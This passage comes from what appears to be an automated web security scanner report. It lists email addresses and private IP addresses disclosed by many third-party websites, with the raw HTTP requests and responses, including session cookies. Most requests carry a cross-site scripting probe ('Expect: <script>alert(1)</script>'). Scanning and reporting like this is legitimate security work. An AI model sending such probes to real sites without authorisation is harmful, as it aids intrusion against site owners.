           DEFAULT_SU
...[SNIP]...
ail address.');
       $('#faq-email').focus();
       return false;
   } else {
       if(window.validEmail) {
           if( !validEmail( $('#faq-email').val() ) ) {
               alert('Please provide a valid email address (example: your-name@some-domain.com).');
               $('#faq-email').focus();
               return false;
           }
       }
   }
   return true;
}

25.77. http://www.thehealthplan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehealthplan.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehealthplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2007.11.07T08:52-0500" exp "2007.11.07T12:00-0500" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Set-Cookie: CFID=13104831;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: CFTOKEN=27842674;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: JSESSIONID=9430fb20c9531d41550077445351f367c726;path=/
Set-Cookie: COOKIESENABLED=true;expires=Thu, 05-May-2011 04:16:44 GMT;path=/
Set-Cookie: TLTSID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com
Set-Cookie: TLTUID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com expires=Wed, 04-05-2021 04:16:44 GMT
Date: Wed, 04 May 2011 04:16:44 GMT
Connection: close

           
                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<a href="mailto:webdatacoordinator@thehealthplan.com">
...[SNIP]...

25.78. http://www.thehorrordome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehorrordome.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehorrordome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Date: Wed, 04 May 2011 00:50:03 GMT
Content-Length: 19399
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: anonymousID=5jOKBmeXzAEkAAAANGJjYTBhMDgtMDI4Yi00ZjJlLThmNjgtOWNjYTI4NzJlZjIzZAhK1pnjGvVUlxMBrIsiF9QZi2c1; expires=Mon, 31-Oct-2011 00:50:03 GMT; path=/; HttpOnly
Set-Cookie: chkvalues=y2OQK7WbjFhnaIqejB5qFgWYgpFVR5lqmOfyHuWZxumlJpIfnO1Zy4XG9s2TMXUr; expires=Mon, 31-Oct-2011 00:50:03 GMT; path=/
Set-Cookie: .ASPXAUTHSF=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly
Set-Cookie: chkvalues=y2OQK7WbjFhnaIqejB5qFgWYgpFVR5lqmOfyHuWZxumlJpIfnO1Zy4XG9s2TMXUr; expires=Mon, 31-Oct-2011 00:50:03 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_headTag"><titl
...[SNIP]...
<a href="mailto:sales@thehorrordome.com">sales@thehorrordome.com</a>
...[SNIP]...

25.79. http://www.timeswv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeswv.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Wed, 04 May 2011 03:43:21 GMT
Content-Type: text/html
Content-Length: 1391
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache1.peak.zope.net
Via: 1.0 cache1.peak.zope.net:8500 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

25.80. http://www.tube303.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tube303.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tube303.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:53:22 GMT
Server: Apache/1.3.34 (Unix)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 485

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.81. http://www.uimn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uimn.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uimn.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 999 No Hacking
Server: WWW Server/1.1
Date: Wed, 04 May 2011 03:56:10 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 848
Pragma: no-cache
Cache-control: no-cache
Expires: Wed, 04 May 2011 03:56:10 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<TITLE>'BIT-0000' - Unavailable</TITLE>
</HEAD>
<BODY>

<b>Error Code: 'BIT-0000' - This page is currently unavailable.</b>
...[SNIP]...
<a href="mailto:deed.webmaster@state.mn.us">deed.webmaster@state.mn.us</a>
...[SNIP]...

25.82. http://www.uww.edu/prebuilt/scripts/flowplayer/flowplayer.ipad-3.2.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uww.edu
Path:   /prebuilt/scripts/flowplayer/flowplayer.ipad-3.2.2.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /prebuilt/scripts/flowplayer/flowplayer.ipad-3.2.2.min.js HTTP/1.1
Host: www.uww.edu
Proxy-Connection: keep-alive
Referer: http://www.uww.edu/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 05 Apr 2011 14:02:43 GMT
Accept-Ranges: bytes
ETag: "7d619229af3cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:29:28 GMT
Content-Length: 11633

/*
* ipad.js 3.2.2. The Flowplayer ipad/iphone fallback.
*
* Copyright 2010, 2011 Flowplayer Oy
* By Thomas Dubois <thomas@flowplayer.org>
*
* This file is part of Flowplayer.
*
* Flowplayer i
...[SNIP]...

25.83. http://www.valpo.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.valpo.edu
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.valpo.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:17:20 GMT
Server: Apache/1.3.33 (Unix) PHP/5.2.3 mod_ssl/2.8.22 OpenSSL/0.9.7d
Content-Type: text/html; charset=iso-8859-1
Content-Length: 477

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@valpo.edu">
...[SNIP]...

25.84. http://www.virginialottery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virginialottery.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virginialottery.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 10659
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:23:00 GMT

<%
dim location, menu_select
location = ""
%>

<html>
<head>
<title>Official Home of the Virginia Lottery</title>
<meta name="description" content="The Virginia Lottery is a state-run lottery
...[SNIP]...
<a href="mailto:webmaster@valottery.com?Subject=brokenlink">webmaster@valottery.com</a>
...[SNIP]...

25.85. http://www.waldameer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.waldameer.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.waldameer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404
Date: Wed, 04 May 2011 02:03:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27039
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADBDDAQ=DEKCBIBACLNANFPJBHCGFCNP; path=/
Cache-control: private

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>404 Page Not Found</title>
<meta name="description" content="">
<meta name="keywords" content="">

...[SNIP]...
<a class="copyright" href="mailto:info@waldameer.com">info@waldameer.com</a>
...[SNIP]...

25.86. http://www.washtimesherald.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washtimesherald.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.washtimesherald.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Wed, 04 May 2011 04:12:04 GMT
Content-Type: text/html
Content-Length: 1399
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache1.peak.zope.net
Via: 1.0 cache1.peak.zope.net:8500 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

25.87. http://www.wellspan.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellspan.org
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellspan.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:26:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!--
    Build Date: 1/12/2011 1:52:51 PM
SiteMaker Release: SM7.1

Code created by:
Medseek, Inc.
2028 Village Lane
Solvang, CA. 93463
Phone 1-888 MEDSEEK
email info@medseek.com
http://www.medseek.com
(c) 1999-2011 Medseek, Inc. All rights reserved.
    -->
...[SNIP]...

25.88. http://www.wetmaturevids.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wetmaturevids.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wetmaturevids.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:29:59 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8
Content-Type: text/html; charset=iso-8859-1
Content-Length: 503

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.89. http://www.wetpantyhosepics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wetpantyhosepics.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wetpantyhosepics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:20:52 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 506

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.90. http://www.wtok.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtok.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wtok.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Server-Name: dv-c1-r2-u14-b12
Content-Type: text/html;charset=utf-8
Date: Wed, 04 May 2011 02:00:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
X-N: S
Content-Length: 34319

<script type="text/javascript">
<!--
window.location = "http://www.wtok.com/sitemap"
//-->
</script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/1999/RE
...[SNIP]...
<a target=_parent href=mailto:jim.briggs@wtok.com>
...[SNIP]...

25.91. http://www.zunga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zunga.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zunga.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:57:15 GMT
Server: Apache/1.3.41 (Unix)
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 486

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:hostmaster@zunga.com">
...[SNIP]...

26. Private IP addresses disclosed  previous  next
There are 62 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


26.1. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Fthe-alpha-level%2F%22%2C%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Fwere-they-the-special-few%2F%22%2C%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Fto-infinity-and-beyond-week-1%2F%22%2C%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Ftales-of-angelic-guidance%2F%22%2C%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Fencounters-with-angels%2F%22%2C%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Fspiritual-awakening%2F%22%2C%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Fthe-invisible-anchor-report%2F%22%2C%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Fpast-life-regression%2F%22%2C%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Fquantum-lullaby%2F%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Tue, 03 May 2011 17:56:04 -0700
Pragma:
X-FB-Rev: 373353
X-FB-Server: 10.42.22.29
X-Cnection: close
Date: Wed, 04 May 2011 00:54:04 GMT
Content-Length: 2629

fb_sharepro_render([{"url":"http:\/\/www.quantumjumping.com\/blog\/the-alpha-level\/","normalized_url":"http:\/\/www.quantumjumping.com\/blog\/the-alpha-level\/","share_count":13,"like_count":0,"comme
...[SNIP]...

26.2. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2Fmeet-your-doppelganger%2F%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Tue, 03 May 2011 17:56:04 -0700
Pragma:
X-FB-Rev: 373353
X-FB-Server: 10.42.16.27
X-Cnection: close
Date: Wed, 04 May 2011 00:54:04 GMT
Content-Length: 318

fb_sharepro_render([{"url":"http:\/\/www.quantumjumping.com\/blog\/meet-your-doppelganger\/","normalized_url":"http:\/\/www.quantumjumping.com\/blog\/meet-your-doppelganger\/","share_count":18,"like_c
...[SNIP]...

26.3. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=f9fdb48329866e3b30dbaf90fc468c1c&w=130&h=130&url=http%3A%2F%2Fblog.theamericanmonk.com%2Ffiles%2F2011%2F04%2Fpositive_affirmations-211x300.png HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/fan.php?id=28843894233&width=300&connections=10&stream=true&header=false&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
X-FB-Server: 10.54.168.37
X-Cnection: close
Content-Length: 19927
Cache-Control: public, max-age=86400
Expires: Thu, 05 May 2011 00:54:09 GMT
Date: Wed, 04 May 2011 00:54:09 GMT
Connection: close

.PNG
.
...IHDR...[.........)..~.. .IDATx...i.d.u.....53..........{z.....9...    . .k.b)D.!..
.w+.p.7Y_..,..E(....dR.@..H..A.C...>........z../...g...>.}.......{.........k..~.{9...../    ....{..M^...w{..~
...[SNIP]...

26.4. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=1e61af56524175076058f736780fceeb&w=130&h=130&url=http%3A%2F%2Fblog.theamericanmonk.com%2Fwp-includes%2Fimages%2Fsmilies%2Ficon_smile.gif HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/fan.php?id=28843894233&width=300&connections=10&stream=true&header=false&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
X-FB-Server: 10.137.44.125
X-Cnection: close
Content-Length: 174
Cache-Control: public, max-age=86400
Expires: Thu, 05 May 2011 00:54:09 GMT
Date: Wed, 04 May 2011 00:54:09 GMT
Connection: close

GIF89a..........EEE...........................333............!.......,..........[.I.j..U.....p.....LA'.'...v.q.j
..?.*p.....!.......    X<+..k....YAb<..v....5.Xj.\...
..0...&..;

26.5. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=03ad0fc5f04843730ca1b83bb9a37bf9&w=90&h=90&url=http%3A%2F%2Fs3.amazonaws.com%2Flaunchimages%2F2011%2Fjoe_bob_nat_ryan.png HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/fan.php?id=28843894233&width=300&connections=10&stream=true&header=false&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
X-FB-Server: 10.54.177.38
X-Cnection: close
Content-Length: 14443
Cache-Control: public, max-age=86400
Expires: Thu, 05 May 2011 00:54:09 GMT
Date: Wed, 04 May 2011 00:54:09 GMT
Connection: close

.PNG
.
...IHDR...Z...C......q.Q.. .IDATx.t.i.d.u.....r..................J.\..A."..h...&..#.6..v..a.....>Hv((..(..SAb'(`..../.=./.........2.j.vFdWf.....{.......D.........ah_G...A...Jg./.g..sdV..k.[._
...[SNIP]...

26.6. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=a0a59c6e7c660c346feff5b140278461&w=130&h=130&url=http%3A%2F%2Fblog.theamericanmonk.com%2Fwp-includes%2Fimages%2Fsmilies%2Ficon_wink.gif HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/fan.php?id=28843894233&width=300&connections=10&stream=true&header=false&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
X-FB-Server: 10.54.117.58
X-Cnection: close
Content-Length: 170
Cache-Control: public, max-age=86400
Expires: Thu, 05 May 2011 00:54:09 GMT
Date: Wed, 04 May 2011 00:54:09 GMT
Connection: close

GIF89a..........EEE..........................................!.......,..........W.I.j........p...C.LA'.0.....0.%&p./.*p..`.C...%+.fP..4O..pU...:.`......kLh....an.fX..$..;

26.7. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/1thKbSBDn8S.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yi/r/1thKbSBDn8S.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yi/r/1thKbSBDn8S.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/fan.php?id=28843894233&width=300&connections=10&stream=true&header=false&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:01 GMT
X-FB-Server: 10.30.146.198
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30248552
Expires: Wed, 18 Apr 2012 03:16:38 GMT
Date: Wed, 04 May 2011 00:54:06 GMT
Connection: close
Content-Length: 389

/*1303182965,169775814*/

.text_exposed_root{display:inline}
.text_exposed .text_exposed_show{display:inline}
.text_exposed_show,
.text_exposed .text_exposed_hide{display:none}
.text_exposed_link{font
...[SNIP]...

26.8. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
